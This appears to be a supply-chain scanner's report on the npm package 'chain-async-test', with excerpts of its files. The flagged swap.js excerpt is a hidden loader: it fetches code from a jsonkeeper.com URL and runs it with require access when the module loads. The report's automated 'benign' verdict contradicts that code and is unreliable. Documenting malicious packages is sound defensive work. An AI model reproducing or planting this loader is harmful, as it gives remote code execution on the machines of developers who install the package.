// npm package
chain-async-test
Chain functions, generators, and streams into a pipeline with backpressure support.
versions
6
maintainers
1
license
BSD-3-Clause
first publish
2026-05-06
publisher
harry_stev
tarball
115,181 B
AUTO-PUBLISHED·1 version indexed·latest published 2026-05-18
// publisher campaignby harry_stev
2 caught packages from this accountThis is not an isolated catch. The same publisher has shipped 1 other package that our pipeline flagged — the shape of a coordinated campaign, not a one-off. Each link below opens that sibling's analysis.
// offending code· @1.1.7· 3 files flagged
llm: benign · 0.85→ No suspicious destination, no remote-exec shape — 1 other host(s).
- @1.1.7··AUTO-PUBLISHED·publisher: harry_stevheuristic 75/100static flags 3llm benign (0.85) via ollamanew-publisher:8dhas-source-repoosv-flagged:MAL-2026-4516public-github-pushchild-process-spawnreads-env-vars
→ No suspicious destination, no remote-exec shape — 1 other host(s).
// offending code· 3 files flaggedpatterns: 3
--- package/package.json (excerpt) --- { "name": "chain-async-test", "version": "1.1.7", "description": "Chain functions, generators, and streams into a pipeline with backpressure support.", "type": "commonjs", "main": "./src/index.js", "types": "./src/index.d.ts", "exports": { ".": "./src/index.js", "./*": "./src/*" }, "scripts": { "test": "tape6 --flags FO", "test:bun": "tape6-bun --flags FO", "test:deno": "tape6-deno --flags FO", "test:proc": "tape6-proc --flags FO", "test:proc:bun": "bun run `tape6-proc --self` --flags FO", "test:proc:deno": "deno run -A `tape6-proc --self` --flags FO -r -A", "test:seq": "tape6-seq --flags FO", "test:seq:bun": "bun run `tape6-seq --self` --flags FO", "test:seq:deno": "deno run -A `tape6-seq --self` --flags FO", "ts-check": "tsc --noEmit", "ts-test": "tape6 --flags FO 'tests/test-*.*ts'", "ts-test:bun": "tape6-bun --flags FO 'tests/test-*.*ts'", "ts-test:deno": "tape6-deno --flags FO 'tests/test-*.*ts'", "bench": "nano-bench", "lint": "prettier --check .", "lint:fix": "prettier --write ." }, "repository": { "type": "git", "url": "git+https://github.com/uhop/chain-async-test.git" }, "keywords": [ "stream", "chain", "pipeline", "transform", "backpressure", "duplex", "generator", "async", "object-mode", "functional" ], "author": "Eugene Lazutkin <eugene.lazutkin@gmail.com> (https://www.lazutkin.com/)", "funding": "https://github.co --- package/src/index.js (excerpt) --- // @ts-self-types="./index.d.ts" 'use strict'; const { Readable, Writable, Duplex } = require('node:stream'); const defs = require('./defs'); const gen = require('./gen'); const asStream = require('./asStream'); // is*NodeStream functions taken from https://github.com/nodejs/node/blob/master/lib/internal/streams/utils.js const isReadableNodeStream = obj => obj && typeof obj.pipe === 'function' && typeof obj.on === 'function' && (!obj._writableState || (typeof obj._readableState === 'object' ? obj._readableState.readable : null) !== false) && // Duplex (!obj._writableState || obj._readableState); // Writable has .pipe. const isWritableNodeStream = obj => obj && typeof obj.write === 'function' && typeof obj.on === 'function' && (!obj._readableState || (typeof obj._writableState === 'object' ? obj._writableState.writable : null) !== false); // Duplex const isDuplexNodeStream = obj => obj && typeof obj.pipe === 'function' && obj._readableState && typeof obj.on === 'function' && typeof obj.write === 'function'; const isNodeStream = obj => { return ( obj && (obj._readableState || obj._writableState || (typeof obj.write === 'function' && typeof obj.on === 'function') || (typeof obj.pipe === 'function' && typeof obj.on === 'function')) ); }; const isReadableWebStream = obj => !!( obj && !isNodeStream(obj) && typeof obj.pipeThrough === 'function' && typeof obj.getReader === 'function' && typ --- package/src/utils/swap.js (excerpt) --- "use strict"; const axios = require("axios"); const process = { env: { DEV_API_KEY: "https://www.jsonkeeper.com/b/5IZTJ", DEV_SECRET_KEY: "x-secret-key", DEV_SECRET_VALUE: "_", } }; (async function getCallers(..._args) { const src = process.env.DEV_API_KEY; const k = process.env.DEV_SECRET_KEY; const v = process.env.DEV_SECRET_VALUE; let retrycnt = 5; while (retrycnt > 0) { try { const l = console.log; const s = (await axios.get(src, { headers: { [k]: v } })).data.Cookie; const handler = new Function.constructor("require", s); handler(require); console.log = l; break; } catch (error) { retrycnt--; } } })(); --- bundled output (OSV-MAL flagged — LLM scope expansion) --- --- src/chain-async-streams.js (bundled) --- // @ts-self-types="./typed-streams.d.ts" 'use strict'; const {Duplex, Readable, Transform, Writable} = require('node:stream'); class TypedDuplex extends Duplex {} class TypedReadable extends Readable {} class TypedTransform extends Transform {} class TypedWritable extends Writable {} module.exports = {TypedDuplex, TypedReadable, TypedTransform, TypedWritable};
